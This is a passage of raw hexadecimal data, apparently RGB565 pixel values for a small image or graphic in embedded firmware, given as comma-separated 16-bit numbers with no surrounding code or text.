0xffff, 0xf7ff, 0xffdf, 0xffdc, 0xffdb, 0xefff, 0x7e7f, 0x0b98, 0x54d8, 0xefff, 0xffde, 0xffff, 0xd7ff, 0x2372, 0x1357, 0x0afc, 0x0b5a, 0x0338, 0x0398, 0x0b76, 0x1378, 0x135a, 0x02b8, 0x2314, 0xd7ff, 0xdfff, 0x5414, 0x1273, 0x0a54, 0xa6ff, 0xbf5f, 0xb71d, 0xffff, 0xbe7a, 0x2a6d, 0x224f, 0x328f, 0xe77f, 0xfffe, 0xf7fe, 0xffff, 0xf7df, 0xf7ff, 0xaefd, 0x0b53, 0x3c9a, 0xe7ff, 0xffbb, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xffff, 0xffff, 0xffff, 0xcefd, 0x1a4f, 0x1b17, 0x0253, 0x9e9f, 0xf7ff, 0xffbf, 0xffbf, 0xffdf, 0xfffe, 0xffff, 0xffbf, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xf7ff, 0xf7ff, 0xefbf, 0x1ab4, 0x1ad5, 0x1251, 0x8d78, 0xe7ff, 0xa69f, 0x01b1, 0x74bb, 0xffff, 0xffdb, 0xffdb, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7fc, 0xfffb, 0xf7bd, 0xe77f, 0x9e1e, 0x0a51, 0x1b57, 0x65bf, 0x23dc, 0x0254, 0x755a, 0xdfff, 0xf79f, 0xf7ff, 0xf7ff, 0xfffe, 0xfffe, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffde, 0xffff, 0xffff, 0xf7fe, 0xffde, 0xffbf, 0xf7fd, 0xefff, 0xcf5f, 0x2250, 0xbf3f, 0xefff, 0xfffd, 0xfffc, 0xffdb, 0xffbd, 0xffff, 0xf7df, 0xefbf, 0xffff, 0xffde, 0xffdf, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xffff, 0xffbf, 0xffff, 0xbfdf, 0x1c35, 0x2373, 0xd7ff, 0xefff, 0xf7fe, 0xffff, 0xffde, 0xffff, 0x4b94, 0x02b6, 0x2399, 0xcfff, 0x9edf, 0x0273, 0x0318, 0x9edf, 0xf7ff, 0x1b30, 0xaf9f, 0x1af3, 0x6d1c, 0x6d19, 0x224a, 0x2249, 0xb6ff, 0x2357, 0x1b38, 0x12b2, 0xbf5f, 0x6431, 0xd7df, 0x6453, 0x95f9, 0x12af, 0xefff, 0xffdf, 0xefff, 0x7e3c, 0x1372, 0x6d58, 0xefff, 0xf7df, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff,
0xf7ff, 0xffdf, 0xffbf, 0xffff, 0xefff, 0xefff, 0xdfdf, 0x4415, 0x0b94, 0xafbf, 0xf7ff, 0xffbd, 0xf7ff, 0x2374, 0x0357, 0x0379, 0x0398, 0x0397, 0x0377, 0x0358, 0x0b78, 0x12d2, 0x42ee, 0xffff, 0xe7ff, 0x3bf8, 0x02b7, 0x1378, 0x22d0, 0xe7ff, 0xdfbf, 0xbf3f, 0x8e1d, 0x0b16, 0x0339, 0x0359, 0x2333, 0xd7df, 0xf7ff, 0xfffe, 0xfffd, 0xf7ff, 0xd7ff, 0x3c99, 0x1b55, 0x9e9f, 0xefff, 0xfffd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffbf, 0xffdf, 0xf7df, 0xffff, 0xffdf, 0xffff, 0xb71f, 0x0ad2, 0x1b16, 0x1a31, 0xaddb, 0xffff, 0xfffe, 0xffbf, 0xffbf, 0xffff, 0xf7fe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xfffd, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xef3d, 0x32f2, 0x0317, 0x0292, 0x7d57, 0xf7ff, 0xa597, 0x6bf2, 0xf7ff, 0xfffd, 0xfffc, 0xfffd, 0xf7fe, 0xfffe, 0xffff, 0xff9f, 0xffff, 0xff9f, 0xffff, 0xf7ff, 0xe7ff, 0xbf5f, 0x4352, 0x7d7d, 0x7ddf, 0x0a51, 0x6497, 0xdfff, 0x7e3f, 0x0271, 0x5497, 0xb69c, 0x3252, 0xae5f, 0xefff, 0xf7ff, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xffff, 0xf7de, 0xfffe, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffde, 0xf7ff, 0xf7ff, 0xefff, 0xa5d7, 0xe79e, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0x84b3, 0x03b9, 0x75dd, 0xf7ff, 0xffff, 0xffde, 0xfffe, 0xffff, 0x5bf4, 0x0a94, 0x1b78, 0xb79f, 0x7dfe, 0x02b5, 0x0319, 0x7dff, 0xcf5f, 0x1b30, 0xafdf, 0x2373, 0x2b14, 0xcf9f, 0x7454, 0xc71d, 0x965d, 0x0294, 0x035a, 0x02d5, 0x7dbc, 0xc73f, 0x5bf5, 0xd7ff, 0x2b34, 0x2b32, 0xffff, 0xffbb, 0xd7ff, 0x03f7, 0x0c18, 0xbefe, 0xffdd, 0xffbd, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xffff, 0xffde,
0xefdf, 0xffdf, 0xffdf, 0xffff, 0xefff, 0xf7ff, 0xf7ff, 0x9ebd, 0x13b4, 0x2c77, 0xdfff, 0xffff, 0xefbf, 0x3393, 0x02f4, 0x0b17, 0x1316, 0x0af4, 0x1335, 0x1b35, 0x0a92, 0x3353, 0xdfff, 0xdfff, 0x4394, 0x0293, 0x1378, 0x0293, 0x2af0, 0xe7ff, 0x6c95, 0x09ac, 0x122d, 0x1b14, 0x0b16, 0x1313, 0x22ef, 0xdfdf, 0xf7df, 0xffde, 0xfffd, 0xe7ff, 0x867f, 0x1395, 0x4456, 0xefff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7bf, 0xf7df, 0xf7ff, 0xc71f, 0x1270, 0x1b34, 0x01cf, 0xa61e, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xdfdf, 0x12b1, 0x1b54, 0x0a30, 0x855a, 0xefff, 0xef9f, 0xffff, 0xffbe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbf, 0xffde, 0xffff, 0xf7ff, 0xe7ff, 0x6c95, 0x124e, 0x1250, 0x6d5d, 0x9f1f, 0x0a70, 0x2af2, 0x5c58, 0x3375, 0x022f, 0x7d9b, 0x9e3c, 0x0a11, 0x1271, 0x5c36, 0xdfbf, 0xf7ff, 0xfffe, 0xfffd, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffde, 0xffde, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffff, 0xf7de, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xdf7d, 0x0bf8, 0x2bb3, 0xd77e, 0xffff, 0xf7ff, 0xf7df, 0xf7ff, 0xb6be, 0x126f, 0x0a4e, 0x11ec, 0x11cb, 0x1271, 0x0ab4, 0x0210, 0x098a, 0x228e, 0xb79f, 0x2395, 0x0ad5, 0x1b17, 0x8e3f, 0x6cf7, 0x1aaf, 0x0af4, 0x1378, 0x0af4, 0x1290, 0x6497, 0x8dde, 0x2356, 0x02b4, 0x3b52, 0xefff, 0xefff, 0x863c, 0x03b6, 0x451a, 0xe7ff, 0xffdd, 0xffde, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff,
0xf7df, 0xffdf, 0xffdf, 0xffdf, 0xf7ff, 0xfffe, 0xfffe, 0xe7ff, 0x44d7, 0x0bd5, 0x5d5a, 0xe7ff, 0xefdf, 0x6c53, 0x3331, 0x3355, 0x42f4, 0x3b35, 0x3333, 0x32f1, 0x53b3, 0xe7ff, 0xdfff, 0x2b33, 0x0ab3, 0x1336, 0x2b75, 0x5435, 0xa63b, 0xefff, 0x6433, 0x3acf, 0x4351, 0x3b53, 0x3b53, 0x32ef, 0x6c52, 0xf7ff, 0xffff, 0xf7be, 0xefff, 0xb79f, 0x1395, 0x0b34, 0xcfff, 0xf7fd, 0xffbc, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xbf1f, 0x01ef, 0x1335, 0x0250, 0xae9e, 0xffff, 0xffbf, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xf7fe, 0xfffe, 0xffde, 0xf7df, 0xf7ff, 0xdfff, 0x1a90, 0x1ab6, 0x01f3, 0x8d5b, 0xf7ff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xefff, 0x961b, 0x1aaf, 0x1291, 0x2357, 0x12f6, 0x0a71, 0xb79f, 0x7538, 0x09cd, 0x1230, 0x11ce, 0x53f5, 0xd7ff, 0x1a8f, 0x1376, 0x1357, 0x0ad5, 0x0a51, 0x7d19, 0xefff, 0xffff, 0xf7dd, 0xfffe, 0xffdf, 0xffdf, 0xffbf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffbe, 0xffff, 0xffbe, 0xffff, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xf7ff, 0x6dfd, 0x1b31, 0x5496, 0xdfff, 0xefff, 0xf7df, 0xffff, 0xefff, 0xcfff, 0x9e19, 0xadf9, 0xbe3b, 0xae3b, 0x95fb, 0x95fa, 0xae5a, 0xb5da, 0xd79f, 0x2bb6, 0x0318, 0x033a, 0x0ad5, 0x0a4e, 0x22ae, 0x3372, 0x1ad1, 0x2332, 0x2b52, 0x1270, 0x0a94, 0x0b58, 0x0378, 0x2af0, 0xd7ff, 0xa73f, 0x1b93, 0x1b94, 0xbfdf, 0xefff, 0xfffe, 0xffbe, 0xffdf, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffde, 0xf7ff, 0xd7ff, 0x23b3, 0x1b95, 0x861e, 0xefff, 0xf7fe, 0xf7ff, 0xefff, 0xf7ff, 0xefff, 0xdfff, 0xefff, 0xf7ff, 0xefbf, 0x2ab0, 0x1313, 0x1335, 0x2333, 0xe7ff, 0xffff, 0xffff, 0xf7df, 0xf7ff, 0xefdf, 0xefff, 0xdfff, 0xdfff, 0xe7ff, 0xffff, 0xffbf, 0xf7bf, 0xefff, 0xc7ff, 0x23d4, 0x1bb5, 0x7dfc, 0xefff, 0xfffd, 0xfffe, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xfffe, 0xffff, 0xffff, 0x9e5d, 0x1a90, 0x1b14, 0x0a71, 0x9e7e, 0xefff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffdd, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffd, 0xffff, 0xdf9f, 0x3af5, 0x1a97, 0x0213, 0x7d1a, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xd79f, 0x3372, 0x02b2, 0x0b57, 0x0338, 0x0b5a, 0x1318, 0x1291, 0x2aad, 0xdfff, 0xc75f, 0x9dfd, 0xb69e, 0xefff, 0x3aef, 0x1a6f, 0x0335, 0x0b98, 0x035a, 0x1359, 0x0a94, 0x2af2, 0xc73f, 0xf7ff, 0xffff, 0xffde, 0xffde, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7fe, 0xffff, 0xffbe, 0xff9e, 0xffbf, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xdfff, 0x3435, 0x0b75, 0x5d9c, 0xdfff, 0xffde, 0xffbd, 0xf7ff, 0xe7ff, 0xe7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xfffe, 0xffdf, 0xefff, 0x1ad2, 0x1338, 0x1359, 0x0252, 0x6d18, 0xe7ff, 0xe7ff, 0xefff, 0xe7ff, 0xd7ff, 0x75bd, 0x0273, 0x1356, 0x0af4, 0x2b53, 0xb7ff, 0x1c17, 0x1353, 0x8e5d, 0xefff, 0xf7ff, 0xffde, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff,
0xfffd, 0xffff, 0xffff, 0xffff, 0xffdd, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xb6dd, 0x2374, 0x1b55, 0x9e9e, 0xefff, 0xfffe, 0xffff, 0xfffe, 0xf7fe, 0xf7ff, 0xf7ff, 0xffdf, 0xf7ff, 0x4bb3, 0x0270, 0x024f, 0x6496, 0xffff, 0xffbf, 0xff7e, 0xffbf, 0xffdf, 0xffdf, 0xffde, 0xf7ff, 0xefff, 0xf7ff, 0xffff, 0xffbe, 0xefff, 0xbfdf, 0x3477, 0x1373, 0x6518, 0xdfff, 0xf7ff, 0xf7de, 0xf7ff, 0xefff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xb6dc, 0x0ad1, 0x1af3, 0x122f, 0xa65d, 0xefff, 0xf7fe, 0xf7fe, 0xf7de, 0xf7ff, 0xffdf, 0xffde, 0xfffd, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7ff, 0xefff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffc, 0xffde, 0xffbe, 0xffff, 0xdf7f, 0x3314, 0x12d8, 0x0234, 0x6d1a, 0xefff, 0xf7ff, 0xf7ff, 0xf7fe, 0xfffe, 0xf7ff, 0xb65d, 0x12f2, 0x0b15, 0x0b78, 0x0359, 0x037a, 0x02f7, 0x1293, 0x6c76, 0xdf7f, 0xe7bf, 0xe7ff, 0xdfff, 0xe7ff, 0xe7ff, 0xd77f, 0x8519, 0x12b2, 0x0ab4, 0x0b58, 0x0339, 0x0b79, 0x0af6, 0x0a72, 0x8ddd, 0xefff, 0xfffe, 0xffdc, 0xff9c, 0xffff, 0xf7ff, 0xf7ff, 0xeffe, 0xf7ff, 0xf7de, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xaf7f, 0x1c59, 0x0356, 0xa6bf, 0xffff, 0xfffc, 0xfffe, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xeffe, 0xfffe, 0xfffd, 0xffbd, 0xfffe, 0xf7ff, 0x5c15, 0x0a10, 0x1231, 0x3b32, 0xdfff, 0xefff, 0xf7ff, 0xffdf, 0xf7de, 0xf7ff, 0xdfff, 0x5436, 0x0a2f, 0x1a90, 0x2c59, 0x455d, 0x1395, 0x5d19, 0xe7ff, 0xf7df, 0xf7de, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff,
0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xa69e, 0x1b54, 0x1b94, 0x7ddb, 0xe7ff, 0xf7ff, 0xfffb, 0xfffc, 0xfffc, 0xfffd, 0xffde, 0xffdf, 0xdfbf, 0xa69e, 0xb73f, 0xdfdf, 0xf7ff, 0xf7be, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xfffc, 0xffdd, 0xffdf, 0xf7be, 0xf7fe, 0xefff, 0xbf7f, 0x33f5, 0x1353, 0x54b7, 0xe7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xf7bf, 0xffbf, 0xffdf, 0xb6bf, 0x0a8f, 0x0b33, 0x022f, 0xae7e, 0xf7df, 0xffff, 0xf7ff, 0xefff, 0xe7ff, 0xf7ff, 0xffbe, 0xffbe, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xf7ff, 0xefff, 0xf7ff, 0xf7be, 0xffdf, 0xfffe, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xffbf, 0xffdf, 0xfffd, 0xf7fc, 0xdfdf, 0x22d4, 0x0ad7, 0x0272, 0x7538, 0xf7ff, 0xffff, 0xf7fe, 0xefff, 0x859b, 0x1213, 0x0335, 0x1377, 0x0af6, 0x12f6, 0x0252, 0x5c79, 0xcf3f, 0xffff, 0xffff, 0x8d36, 0x2ace, 0x4c56, 0x3372, 0x6434, 0xf7ff, 0xffff, 0xdfbf, 0x6c97, 0x1ab1, 0x02b2, 0x0314, 0x1357, 0x1338, 0x0233, 0x5c59, 0xefff, 0xf7dd, 0xffdc, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf79e, 0xffff, 0xffbc, 0xe7ff, 0x96ff, 0x1374, 0x2353, 0x961c, 0xe7ff, 0xf7de, 0xffde, 0xffde, 0xffdd, 0xf7ff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xe7df, 0x959b, 0xa63d, 0xe7ff, 0xefff, 0xf7ff, 0xf7df, 0xffdf, 0xfffe, 0xffdc, 0xfffd, 0xefff, 0xa69e, 0x85fd, 0x1c9a, 0x13b6, 0x4c77, 0xdfff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
